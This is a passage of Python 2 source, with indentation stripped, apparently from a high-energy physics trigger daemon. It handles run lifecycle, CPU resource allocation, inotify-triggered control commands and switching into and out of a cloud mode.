for cpu in resource.cpu:
if cpu not in cleared_q:
try:
os.rename(used+cpu,idles+cpu)
self.n_used-=1
except OSError:
#@SM:can happen if it was quarantined
logger.warning('Unable to find resource '+used+cpu)
except Exception as ex:
resource_lock.release()
raise(ex)
resource.process=None
resource_lock.release()
logger.info('completed clearing resource list')
self.online_resource_list = []
try:
self.changeMarkerMaybe(Run.ABORTCOMPLETE)
except OSError as ex:
pass
try:
if self.anelastic_monitor:
if killScripts:
self.anelastic_monitor.terminate()
self.anelastic_monitor.wait()
except OSError as ex:
if ex.errno==3:
logger.info("anelastic.py for run " + str(self.runnumber) + " is not running")
except Exception as ex:
logger.exception(ex)
if conf.use_elasticsearch == True:
try:
if self.elastic_monitor:
if killScripts:
self.elastic_monitor.terminate()
#allow monitoring thread to finish, but no more than 30 seconds after others
killtimer = threading.Timer(30., self.elastic_monitor.kill)
try:
killtimer.start()
self.elastic_monitor.wait()
finally:
killtimer.cancel()
try:self.elastic_monitor=None
except:pass
except OSError as ex:
if ex.errno==3:
logger.info("elastic.py for run " + str(self.runnumber) + " is not running")
else :logger.exception(ex)
except Exception as ex:
logger.exception(ex)
if self.waitForEndThread is not None:
self.waitForEndThread.join()
except Exception as ex:
logger.info("exception encountered in shutting down resources")
logger.exception(ex)
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
try:
if conf.delete_run_dir is not None and conf.delete_run_dir == True:
shutil.rmtree(conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding))
os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
except:
pass
logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' completed')
def ShutdownBU(self):
self.is_ongoing_run = False
try:
if self.elastic_monitor:
#first check if process is alive
if self.elastic_monitor.poll() is None:
self.elastic_monitor.terminate()
time.sleep(.1)
except Exception as ex:
logger.info("exception encountered in shutting down elasticbu.py: " + str(ex))
#logger.exception(ex)
#should also trigger destructor of the Run
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' on BU completed')
def StartWaitForEnd(self):
self.is_ongoing_run = False
self.changeMarkerMaybe(Run.STOPPING)
try:
self.waitForEndThread = threading.Thread(target = self.WaitForEnd)
self.waitForEndThread.start()
except Exception as ex:
logger.info("exception encountered in starting run end thread")
logger.info(ex)
def WaitForEnd(self):
logger.info("wait for end thread!")
global cloud_mode
global entering_cloud_mode
global abort_cloud_mode
try:
for resource in self.online_resource_list:
if resource.processstate is not None:
if resource.process is not None and resource.process.pid is not None: ppid = resource.process.pid
else: ppid="None"
logger.info('waiting for process '+str(ppid)+
' in state '+str(resource.processstate) +
' to complete ')
try:
resource.join()
logger.info('process '+str(resource.process.pid)+' completed')
except:pass
resource.clearQuarantined()
resource.process=None
self.online_resource_list = []
if conf.role == 'fu':
logger.info('writing complete file')
self.changeMarkerMaybe(Run.COMPLETE)
try:
os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
except:pass
try:
if conf.dqm_machine==False:
self.anelastic_monitor.wait()
except OSError,ex:
if "No child processes" not in str(ex):
logger.info("Exception encountered in waiting for termination of anelastic:" +str(ex))
self.anelastic_monitor = None
if conf.use_elasticsearch == True:
try:
self.elastic_monitor.wait()
except OSError,ex:
if "No child processes" not in str(ex):
logger.info("Exception encountered in waiting for termination of anelastic:" +str(ex))
self.elastic_monitor = None
if conf.delete_run_dir is not None and conf.delete_run_dir == True:
try:
shutil.rmtree(self.dirname)
except Exception as ex:
logger.exception(ex)
global runList
#todo:clear this external thread
resource_lock.acquire()
logger.info("active runs.."+str(runList.getActiveRunNumbers()))
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
logger.info("new active runs.."+str(runList.getActiveRunNumbers()))
global resources_blocked_flag
if cloud_mode==True:
if len(runList.getActiveRunNumbers())>=1:
logger.info("VM mode: waiting for runs: " + str(runList.getActiveRunNumbers()) + " to finish")
else:
logger.info("No active runs. moving all resource files to cloud")
#give resources to cloud and bail out
entering_cloud_mode=False
#check if cloud mode switch has been aborted in the meantime
if abort_cloud_mode:
abort_cloud_mode=False
resources_blocked_flag=True
cloud_mode=False
resource_lock.release()
return
move_resources_to_cloud()
resource_lock.release()
ignite_cloud()
logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
try:resource_lock.release()
except:pass
except Exception as ex:
logger.error("exception encountered in ending run")
logger.exception(ex)
try:resource_lock.release()
except:pass
def changeMarkerMaybe(self,marker):
dir = self.dirname
current = filter(lambda x: x in Run.VALID_MARKERS, os.listdir(dir))
if (len(current)==1 and current[0] != marker) or len(current)==0:
if len(current)==1: os.remove(dir+'/'+current[0])
fp = open(dir+'/'+marker,'w+')
fp.close()
else:
logger.error("There are more than one markers for run "
+str(self.runnumber))
return
def checkQuarantinedLimit(self):
allQuarantined=True
for r in self.online_resource_list:
try:
if r.watchdog.quarantined==False or r.processstate==100:allQuarantined=False
except:
allQuarantined=False
if allQuarantined==True:
return True
else:
return False
def startAnelasticWatchdog(self):
try:
self.anelasticWatchdog = threading.Thread(target = self.runAnelasticWatchdog)
self.anelasticWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting anelastic watchdog thread")
logger.info(ex)
def runAnelasticWatchdog(self):
try:
self.anelastic_monitor.wait()
if self.is_ongoing_run == True:
#abort the run
self.anelasticWatchdog=None
logger.warning("Premature end of anelastic.py for run "+str(self.runnumber))
self.Shutdown(killJobs=True,killScripts=True)
except:
pass
self.anelastic_monitor=None
def startElasticBUWatchdog(self):
try:
self.elasticBUWatchdog = threading.Thread(target = self.runElasticBUWatchdog)
self.elasticBUWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting elasticbu watchdog thread")
logger.info(ex)
def runElasticBUWatchdog(self):
try:
self.elastic_monitor.wait()
except:
pass
self.elastic_monitor=None
def startCompletedChecker(self):
try:
logger.info('start checking completion of run '+str(self.runnumber))
self.completedChecker = threading.Thread(target = self.runCompletedChecker)
self.completedChecker.start()
except Exception,ex:
logger.error('failure to start run completion checker:')
logger.exception(ex)
def runCompletedChecker(self):
rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
self.threadEvent.wait(10)
while self.stopThreads == False:
self.threadEvent.wait(5)
if os.path.exists(eorCheckPath) or os.path.exists(rundirCheckPath)==False:
logger.info("Completed checker: detected end of run "+str(self.runnumber))
break
while self.stopThreads==False:
self.threadEvent.wait(5)
success, runFound = self.checkNotifiedBoxes()
if success and runFound==False:
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
logger.info("Completed checker: end of processing of run "+str(self.runnumber))
break
def createEmptyEoRMaybe(self):
#this is used to notify elasticBU to fill the end time before it is terminated
rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
try:
os.stat(eorCheckPath)
except:
logger.info('creating empty EoR file in run directory '+rundirCheckPath)
try:
with open(eorCheckPath,'w') as fi:
pass
time.sleep(.5)
except Exception as ex:
logger.exception(ex)
def checkNotifiedBoxes(self):
keys = boxinfoFUMap.keys()
c_time = time.time()
for key in keys:
#if key==thishost:continue #checked in inotify thread
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:
#key deleted
return False,False
if c_time - etime > 20:continue
#parsing or file access, check failed
if lastStatus==False: return False,False
try:
#run is found in at least one box
if self.runnumber in edata['activeRuns']:return True,True
except:
#invalid boxinfo data
return False,False
#all box data are valid, run not found
return True,False
class RunList:
def __init__(self):
self.runs = []
def add(self,runObj):
runNumber = runObj.runnumber
check = filter(lambda x: runNumber == x.runnumber,self.runs)
if len(check):
raise Exception("Run "+str(runNumber)+" already exists")
#doc = {runNumber:runObj}
#self.runs.append(doc)
self.runs.append(runObj)
def remove(self,runNumber):
#runs = map(lambda x: x.keys()[0]==runNumber)
runs = filter(lambda x: x.runnumber==runNumber,self.runs)
if len(runs)>1:
logger.error("Multiple runs entries for "+str(runNumber)+" were found while removing run")
for run in runs[:]: self.runs.pop(self.runs.index(run))
def getOngoingRuns(self):
#return map(lambda x: x[x.keys()[0]], filter(lambda x: x.is_ongoing_run==True,self.runs))
return filter(lambda x: x.is_ongoing_run==True,self.runs)
def getQuarantinedRuns(self):
return filter(lambda x: x.pending_shutdown==True,self.runs)
def getActiveRuns(self):
#return map(lambda x.runnumber: x, self.runs)
return self.runs[:]
def getActiveRunNumbers(self):
return map(lambda x: x.runnumber, self.runs)
def getLastRun(self):
try:
return self.runs[-1]
except:
return None
def getLastOngoingRun(self):
try:
return self.getOngoingRuns()[-1]
except:
return None
def getRun(self,runNumber):
try:
return filter(lambda x: x.runnumber==runNumber,self.runs)[0]
except:
return None
def isLatestRun(self,runObj):
#TODO:test
return self.runs[-1] == runObj
#return len(filter(lambda x: x.runnumber>runObj.runnumber,self.runs))==0
def getStateDoc(self):
docArray = []
for runObj in self.runs:
docArray.append({'run':runObj.runnumber,'totalRes':runObj.n_used,'qRes':runObj.n_quarantined,'ongoing':runObj.is_ongoing_run,'errors':runObj.num_errors})
return docArray
class RunRanger:
def __init__(self,instance):
self.inotifyWrapper = InotifyWrapper(self)
self.instance = instance
def register_inotify_path(self,path,mask):
self.inotifyWrapper.registerPath(path,mask)
def start_inotify(self):
self.inotifyWrapper.start()
def stop_inotify(self):
self.inotifyWrapper.stop()
self.inotifyWrapper.join()
logger.info("RunRanger: Inotify wrapper shutdown done")
def process_IN_CREATE(self, event):
nr=0
global runList
global cloud_mode
global entering_cloud_mode
global exiting_cloud_mode
global abort_cloud_mode
global resources_blocked_flag
global cached_pending_run
global disabled_resource_allocation
global masked_resources
fullpath = event.fullpath
logger.info('RunRanger: event '+fullpath)
dirname=fullpath[fullpath.rfind("/")+1:]
logger.info('RunRanger: new filename '+dirname)
if dirname.startswith('run'):
if dirname.endswith('.reprocess'):
#reprocessing triggered
dirname = dirname[:dirname.rfind('.reprocess')]
fullpath = fullpath[:fullpath.rfind('.reprocess')]
logger.info('Triggered reprocessing of '+ dirname)
try:os.unlink(event.fullpath)
except:
try:os.rmdir(event.fullpath)
except:pass
if os.path.islink(fullpath):
logger.info('directory ' + fullpath + ' is link. Ignoring this run')
return
if not os.path.isdir(fullpath):
logger.info(fullpath +' is a file. A directory is needed to start a run.')
return
nr=int(dirname[3:])
if nr!=0:
# the dqm BU processes a run if the "global run file" is not mandatory or if the run is a global run
is_global_run = os.path.exists(fullpath[:fullpath.rfind("/")+1] + dqm_globalrun_filepattern.format(str(nr).zfill(conf.run_number_padding)))
dqm_processing_criterion = (not conf.dqm_globallock) or (conf.role != 'bu') or (is_global_run)
if (not conf.dqm_machine) or dqm_processing_criterion:
try:
logger.info('new run '+str(nr))
#terminate quarantined runs
for run in runList.getQuarantinedRuns():
#run shutdown waiting for scripts to finish
run.startShutdown(True,False)
time.sleep(.1)
resources_blocked_flag=False
if cloud_mode==True:
logger.info("received new run notification in CLOUD mode. Ignoring new run.")
#remember this run and attempt to continue it once hltd exits the cloud mode
cached_pending_run = fullpath
os.rmdir(fullpath)
return
if conf.role == 'fu':
bu_dir = bu_disk_list_ramdisk_instance[0]+'/'+dirname
try:
os.symlink(bu_dir+'/jsd',fullpath+'/jsd')
except:
if not conf.dqm_machine:
logger.warning('jsd directory symlink error, continuing without creating link')
pass
else:
bu_dir = ''
#check if this run is a duplicate
if runList.getRun(nr)!=None:
raise Exception("Attempting to create duplicate run "+str(nr))
# in case of a DQM machines create an EoR file
if conf.dqm_machine and conf.role == 'bu':
for run in runList.getOngoingRuns():
EoR_file_name = run.dirname + '/' + 'run' + str(run.runnumber).zfill(conf.run_number_padding) + '_ls0000_EoR.jsn'
if run.is_ongoing_run and not os.path.exists(EoR_file_name):
# create an EoR file that will trigger all the running jobs to exit nicely
open(EoR_file_name, 'w').close()
run = Run(nr,fullpath,bu_dir,self.instance)
if not run.inputdir_exists and conf.role=='fu':
logger.info('skipping '+ fullpath + ' with raw input directory missing')
shutil.rmtree(fullpath)
del(run)
return
resource_lock.acquire()
runList.add(run)
try:
if conf.role=='fu' and not entering_cloud_mode and not has_active_resources():
logger.error('trying to start a run '+str(run.runnumber)+ ' without any available resources - this requires manual intervention !')
except Exception,ex:
logger.exception(ex)
if run.AcquireResources(mode='greedy'):
run.CheckTemplate()
run.Start()
else:
#BU mode: failed to get blacklist
runList.remove(nr)
resource_lock.release()
del(run)
return
resource_lock.release()
if conf.role == 'bu' and conf.instance != 'main':
logger.info('creating run symlink in main ramdisk directory')
main_ramdisk = os.path.dirname(os.path.normpath(conf.watch_directory))
os.symlink(fullpath,os.path.join(main_ramdisk,os.path.basename(fullpath)))
except OSError as ex:
logger.error("RunRanger: "+str(ex)+" "+ex.filename)
logger.exception(ex)
except Exception as ex:
logger.error("RunRanger: unexpected exception encountered in forking hlt slave")
logger.exception(ex)
try:resource_lock.release()
except:pass
elif dirname.startswith('emu'):
nr=int(dirname[3:])
if nr!=0:
try:
"""
start a new BU emulator run here - this will trigger the start of the HLT run
"""
bu_emulator.startNewRun(nr)
except Exception as ex:
logger.info("exception encountered in starting BU emulator run")
logger.info(ex)
os.remove(fullpath)
elif dirname.startswith('end'):
# need to check is stripped name is actually an integer to serve
# as run number
if dirname[3:].isdigit():
nr=int(dirname[3:])
if nr!=0:
try:
endingRun = runList.getRun(nr)
if endingRun==None:
logger.warning('request to end run '+str(nr)
+' which does not exist')
os.remove(fullpath)
else:
logger.info('end run '+str(nr))
#remove from runList to prevent intermittent restarts
#lock used to fix a race condition when core files are being moved around
endingRun.is_ongoing_run==False
time.sleep(.1)
if conf.role == 'fu':
endingRun.StartWaitForEnd()
if bu_emulator and bu_emulator.runnumber != None:
bu_emulator.stop()
#logger.info('run '+str(nr)+' removing end-of-run marker')
#os.remove(fullpath)
except Exception as ex:
logger.info("exception encountered when waiting hlt run to end")
logger.info(ex)
else:
logger.error('request to end run '+str(nr)
+' which is an invalid run number - this should '
+'*never* happen')
else:
logger.error('request to end run '+str(nr)
+' which is NOT a run number - this should '
+'*never* happen')
elif dirname.startswith('herod') or dirname.startswith('tsunami'):
os.remove(fullpath)
if conf.role == 'fu':
global q_list
logger.info("killing all CMSSW child processes")
for run in runList.getActiveRuns():
run.Shutdown(True,False)
time.sleep(.2)
#clear all quarantined cores
for cpu in q_list:
try:
logger.info('Clearing quarantined resource '+cpu)
os.rename(quarantined+cpu,idles+cpu)
except:
logger.info('Quarantined resource was already cleared: '+cpu)
q_list=[]
elif conf.role == 'bu':
for run in runList.getActiveRuns():
run.createEmptyEoRMaybe()
run.ShutdownBU()
#delete input and output BU directories
if dirname.startswith('tsunami'):
logger.info('tsunami approaching: cleaning all ramdisk and output run data')
cleanup_bu_disks(None,True,True)
#contact any FU that appears alive
boxdir = conf.resource_base +'/boxes/'
try:
dirlist = os.listdir(boxdir)
current_time = time.time()
logger.info("sending herod to child FUs")
for name in dirlist:
if name == os.uname()[1]:continue
age = current_time - os.path.getmtime(boxdir+name)
logger.info('found box '+name+' with keepalive age '+str(age))
if age < 20:
try:
connection = httplib.HTTPConnection(name, conf.cgi_port - conf.cgi_instance_port_offset,timeout=5)
time.sleep(0.05)
connection.request("GET",'cgi-bin/herod_cgi.py')
time.sleep(0.1)
response = connection.getresponse()
except Exception as ex:
logger.error("exception encountered in contacting resource "+str(name))
logger.exception(ex)
logger.info("sent herod to all child FUs")
except Exception as ex:
logger.error("exception encountered in contacting resources")
logger.info(ex)
elif dirname.startswith('cleanoutput'):
os.remove(fullpath)
nlen = len('cleanoutput')
if len(dirname)==nlen:
logger.info('cleaning output (all run data)'+str(rn))
cleanup_bu_disks(None,False,True)
else:
try:
rn = int(dirname[nlen:])
logger.info('cleaning output (only for run '+str(rn)+')')
cleanup_bu_disks(rn,False,True)
except:
logger.error('Could not parse '+dirname)
elif dirname.startswith('cleanramdisk'):
os.remove(fullpath)
nlen = len('cleanramdisk')
if len(dirname)==nlen:
logger.info('cleaning ramdisk (all run data)'+str(rn))
cleanup_bu_disks(None,True,False)
else:
try:
rn = int(dirname[nlen:])
logger.info('cleaning ramdisk (only for run '+str(rn)+')')
cleanup_bu_disks(rn,True,False)
except:
logger.error('Could not parse '+dirname)
elif dirname.startswith('populationcontrol'):
if len(runList.runs)>0:
logger.info("terminating all ongoing runs via cgi interface (populationcontrol): "+str(runList.getActiveRunNumbers()))
for run in runList.getActiveRuns():
if conf.role=='fu':
run.Shutdown(True,True)
elif conf.role=='bu':
run.ShutdownBU()
logger.info("terminated all ongoing runs via cgi interface (populationcontrol)")
os.remove(fullpath)
elif dirname.startswith('harakiri') and conf.role == 'fu':
os.remove(fullpath)
pid=os.getpid()
logger.info('asked to commit seppuku:'+str(pid))
try:
logger.info('sending signal '+str(SIGKILL)+' to myself:'+str(pid))
retval = os.kill(pid, SIGKILL)
logger.info('sent SIGINT to myself:'+str(pid))
logger.info('got return '+str(retval)+'waiting to die...and hope for the best')
except Exception as ex:
logger.error("exception in committing harakiri - the blade is not sharp enough...")
logger.error(ex)
elif dirname.startswith('quarantined'):
try:
os.remove(dirname)
except:
pass
if dirname[11:].isdigit():
nr=int(dirname[11:])
if nr!=0:
try:
run = runList.getRun(nr)
if run.checkQuarantinedLimit():
if runList.isLatestRun(run):
logger.info('reached quarantined limit - pending Shutdown for run:'+str(nr))
run.pending_shutdown=True
else:
logger.info('reached quarantined limit - initiating Shutdown for run:'+str(nr))
run.startShutdown(True,False)
except Exception as ex:
logger.exception(ex)
elif dirname.startswith('suspend') and conf.role == 'fu':
logger.info('suspend mountpoints initiated')
replyport = int(dirname[7:]) if dirname[7:].isdigit()==True else conf.cgi_port
global suspended
suspended=True
#terminate all ongoing runs
for run in runList.getActiveRuns():
run.Shutdown(True,True)
time.sleep(.5)
#local request used in case of stale file handle
if replyport==0:
umount_success = cleanup_mountpoints()
try:os.remove(fullpath)
except:pass
suspended=False
logger.info("Remount requested locally is performed.")
return
umount_success = cleanup_mountpoints(remount=False)
if umount_success==False:
time.sleep(1)
logger.error("Suspend initiated from BU failed, trying again...")
#notifying itself again
try:os.remove(fullpath)
except:pass
fp = open(fullpath,"w+")
fp.close()
return
#find out BU name from bus_config
bu_name=None
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
for line in open(bus_config):
bu_name=line.split('.')[0]
break
#first report to BU that umount was done
try:
if bu_name==None:
logger.fatal("No BU name was found in the bus.config file. Leaving mount points unmounted until the hltd service restart.")
os.remove(fullpath)
return
connection = httplib.HTTPConnection(bu_name, replyport+20,timeout=5)
connection.request("GET",'cgi-bin/report_suspend_cgi.py?host='+os.uname()[1])
response = connection.getresponse()
except Exception as ex:
logger.error("Unable to report suspend state to BU "+str(bu_name)+':'+str(replyport+20))
logger.exception(ex)
#loop while BU is not reachable
while True:
try:
#reopen bus.config in case is modified or moved around
bu_name=None
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
try:
for line in open(bus_config):
bu_name=line.split('.')[0]
break
except:
logger.info('exception test 1')
time.sleep(5)
continue
if bu_name==None:
logger.info('exception test 2')
time.sleep(5)
continue
logger.info('checking if BU hltd is available...')
connection = httplib.HTTPConnection(bu_name, replyport,timeout=5)
connection.request("GET",'cgi-bin/getcwd_cgi.py')
response = connection.getresponse()
logger.info('BU hltd is running !...')
#if we got here, the service is back up
break
except Exception as ex:
try:
logger.info('Failed to contact BU hltd service: ' + str(ex.args[0]) +" "+ str(ex.args[1]))
except:
logger.info('Failed to contact BU hltd service '+str(ex))
time.sleep(5)
#mount again
cleanup_mountpoints()
try:os.remove(fullpath)
except:pass
suspended=False
logger.info("Remount is performed")
elif dirname=='stop' and conf.role == 'fu':
logger.fatal("Stopping all runs..")
masked_resources=True
#make sure to not run inotify acquire while we are here
resource_lock.acquire()
disabled_resource_allocation=True
resource_lock.release()
#shut down any quarantined runs
try:
for run in runList.getQuarantinedRuns():
run.Shutdown(True,False)
listOfActiveRuns = runList.getActiveRuns()
for run in listOfActiveRuns:
if not run.pending_shutdown:
if len(run.online_resource_list)==0:
run.Shutdown(True,False)
else:
resource_lock.acquire()
run.Stop()
resource_lock.release()
time.sleep(.1)
except Exception as ex:
logger.fatal("Unable to stop run(s)")
logger.exception(ex)
disabled_resource_allocation=False
try:resource_lock.release()
except:pass
os.remove(fullpath)
elif dirname.startswith('exclude') and conf.role == 'fu':
#service on this machine is asked to be excluded for cloud use
if cloud_mode:
logger.info('already in cloud mode')
os.remove(fullpath)
return
else:
logger.info('machine exclude initiated')
if is_cloud_inactive()>=100:
logger.error("Unable to switch to cloud mode (igniter script error)")
os.remove(fullpath)
return
#make sure to not run not acquire resources by inotify while we are here
resource_lock.acquire()
cloud_mode=True
entering_cloud_mode=True
resource_lock.release()
time.sleep(.1)
#shut down any quarantined runs
try:
for run in runList.getQuarantinedRuns():
run.Shutdown(True,False)
requested_stop=False
listOfActiveRuns = runList.getActiveRuns()
for run in listOfActiveRuns:
if not run.pending_shutdown:
if len(run.online_resource_list)==0:
run.Shutdown(True,False)
else:
resource_lock.acquire()
requested_stop=True
run.Stop()
resource_lock.release()
time.sleep(.1)
resource_lock.acquire()
if requested_stop==False:
#no runs present, switch to cloud mode immediately
entering_cloud_mode=False
move_resources_to_cloud()
resource_lock.release()
ignite_cloud()
logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
except Exception as ex:
logger.fatal("Unable to clear runs. Will not enter VM mode.")
logger.exception(ex)
entering_cloud_mode=False
cloud_mode=False
try:resource_lock.release()
except:pass
os.remove(fullpath)
elif dirname.startswith('include') and conf.role == 'fu':
#masked_resources=False
if cloud_mode==False:
logger.error('received notification to exit from cloud but machine is not in cloud mode!')
os.remove(fullpath)
if not is_cloud_inactive():
logger.info('cloud scripts are running, trying to stop')
extinguish_cloud()
return
resource_lock.acquire()
if entering_cloud_mode:
abort_cloud_mode=True
resource_lock.release()
os.remove(fullpath)
return
resource_lock.release()
#run stop cloud notification
exiting_cloud_mode=True
if is_cloud_inactive():
logger.warning('received command to deactivate cloud, but cloud scripts are not running!')
extinguish_cloud()
while True:
last_status = is_cloud_inactive()
if last_status==0: #state: running
logger.info('cloud scripts are still active')
time.sleep(1)
continue
else:
logger.info('cloud scripts have been deactivated')
if last_status>1:
logger.warning('Received error code from cloud igniter script. Switching off cloud mode')
resource_lock.acquire()
resources_blocked_flag=True
cloud_mode=False
cleanup_resources()
resource_lock.release()
break
exiting_cloud_mode=False
os.remove(fullpath)
if cached_pending_run != None:
#create last pending run received during the cloud mode
time.sleep(5) #let core file notifications run
os.mkdir(cached_pending_run)
cached_pending_run = None
else: time.sleep(2)
logger.info('cloud mode in hltd has been switched off')
elif dirname.startswith('logrestart'):
#hook to restart logcollector process manually
restartLogCollector(self.instance)
os.remove(fullpath)
logger.debug("RunRanger completed handling of event "+fullpath)
def process_default(self, event):
logger.info('RunRanger: event '+event.fullpath+' type '+str(event.mask))
filename=event.fullpath[event.fullpath.rfind("/")+1:]
class ResourceRanger:
def __init__(self):
self.inotifyWrapper = InotifyWrapper(self)
self.managed_monitor = system_monitor()
self.managed_monitor.start()
self.regpath = []
def register_inotify_path(self,path,mask):
self.inotifyWrapper.registerPath(path,mask)
self.regpath.append(path)
def start_inotify(self):
self.inotifyWrapper.start()
def stop_managed_monitor(self):
self.managed_monitor.stop()
self.managed_monitor.join()
logger.info("ResourceRanger: managed monitor shutdown done")
def stop_inotify(self):
self.inotifyWrapper.stop()
self.inotifyWrapper.join()
logger.info("ResourceRanger: Inotify wrapper shutdown done")
def process_IN_MOVED_TO(self, event):
logger.debug('ResourceRanger-MOVEDTO: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
resourcepath=event.fullpath[1:event.fullpath.rfind("/")]
resourcestate=resourcepath[resourcepath.rfind("/")+1:]
resourcename=event.fullpath[event.fullpath.rfind("/")+1:]
resource_lock.acquire()
if not (resourcestate == 'online' or resourcestate == 'cloud'
or resourcestate == 'quarantined'):
logger.debug('ResourceNotifier: new resource '
+resourcename
+' in '
+resourcepath
+' state '
+resourcestate
)
if cloud_mode and not entering_cloud_mode and not exiting_cloud_mode and not abort_cloud_mode and not disabled_resource_allocation:
time.sleep(1)
logging.info('detected resource moved to non-cloud resource dir while already switched to cloud mode. Deactivating cloud.')
with open(os.path.join(conf.watch_directory,'include'),'w+') as fobj:
pass
resource_lock.release()
time.sleep(1)
return
run = runList.getLastOngoingRun()
if run is not None:
logger.info("ResourceRanger: found active run "+str(run.runnumber)+ " when received inotify MOVED event for "+event.fullpath)
"""grab resources that become available
#@@EM implement threaded acquisition of resources here
"""
#find all idle cores
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.exception(ex)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
fileFound=False
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
#acquire sufficient cores for a multithreaded process start
#returns whether it can be matched to existing online resource or not
matchedList = run.MatchResource(reslist)
if matchedList:
#matched with previous resource (restarting process)
acquired_sufficient = True
res = run.AcquireResource(matchedList,resourcestate)
else:
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
acquired_sufficient = False
if len(resourcenames) == nstreams:
acquired_sufficient = True
res = run.AcquireResource(resourcenames,resourcestate)
if acquired_sufficient:
logger.info("ResourceRanger: acquired resource(s) "+str(res.cpu))
run.StartOnResource(res)
logger.info("ResourceRanger: started process on resource "
+str(res.cpu))
else:
#if no run is active, move (x N threads) files from except to idle to be picked up for the next run
#todo: debug,write test for this...
if resourcestate == 'except':
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
if len(resourcenames) == nstreams:
for resname in resourcenames:
os.rename(broken+resname,idles+resname)
except Exception as ex:
logger.info("exception encountered in looking for resources in except")
logger.info(ex)
elif resourcestate=="cloud":
#check if cloud mode was initiated, activate if necessary
if conf.role=='fu' and cloud_mode==False:
time.sleep(1)
logging.info('detected core moved to cloud resources. Triggering cloud activation sequence.')
with open(os.path.join(conf.watch_directory,'exclude'),'w+') as fobj:
pass
time.sleep(1)
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
try:
resource_lock.release()
except:pass
def process_IN_MODIFY(self, event):
logger.debug('ResourceRanger-MODIFY: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
#this should be error (i.e. bus.confg should not be modified during a run)
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if event.fullpath == bus_config:
logger.warning("automatic remounting on changed bus.config is no longer supported. restart hltd to remount")
if False:
if self.managed_monitor:
self.managed_monitor.stop()
self.managed_monitor.join()
cleanup_mountpoints()
if self.managed_monitor:
self.managed_monitor = system_monitor()
self.managed_monitor.start()
logger.info("ResouceRanger: managed monitor is "+str(self.managed_monitor))
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
def process_IN_CREATE(self, event):
logger.debug('ResourceRanger-CREATE: event '+event.fullpath)
if conf.dqm_machine:return
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if basename=='blacklist':return
if basename.startswith('test'):return
if conf.role!='bu' or basename.endswith(os.uname()[1]):
return
try:
resourceage = os.path.getmtime(event.fullpath)
resource_lock.acquire()
lrun = runList.getLastRun()
newRes = None
if lrun!=None:
if lrun.checkStaleResourceFile(event.fullpath):
logger.error("Run "+str(lrun.runnumber)+" notification: skipping resource "+basename+" which is stale")
resource_lock.release()
return
logger.info('Try attaching FU resource: last run is '+str(lrun.runnumber))
newRes = lrun.maybeNotifyNewRun(basename,resourceage)
resource_lock.release()
if newRes:
newRes.NotifyNewRun(lrun.runnumber)
except Exception as ex:
logger.exception(ex)
try:resource_lock.release()
except:pass
def process_default(self, event):
logger.debug('ResourceRanger: event '+event.fullpath +' type '+ str(event.mask))
filename=event.fullpath[event.fullpath.rfind("/")+1:]
def process_IN_CLOSE_WRITE(self, event):
logger.debug('ResourceRanger-IN_CLOSE_WRITE: event '+event.fullpath)
global machine_blacklist
resourcepath=event.fullpath[0:event.fullpath.rfind("/")]
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if conf.role=='fu':return
if basename == os.uname()[1]:return
if basename.startswith('test'):return
if basename == 'blacklist':
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
try:
machine_blacklist = json.load(fi)
except:
pass
if resourcepath.endswith('boxes'):
global boxinfoFUMap
if basename in machine_blacklist:
try:boxinfoFUMap.remove(basename)
except:pass
else:
current_time = time.time()
current_datetime = datetime.datetime.utcfromtimestamp(current_time)
emptyBox=False
try:
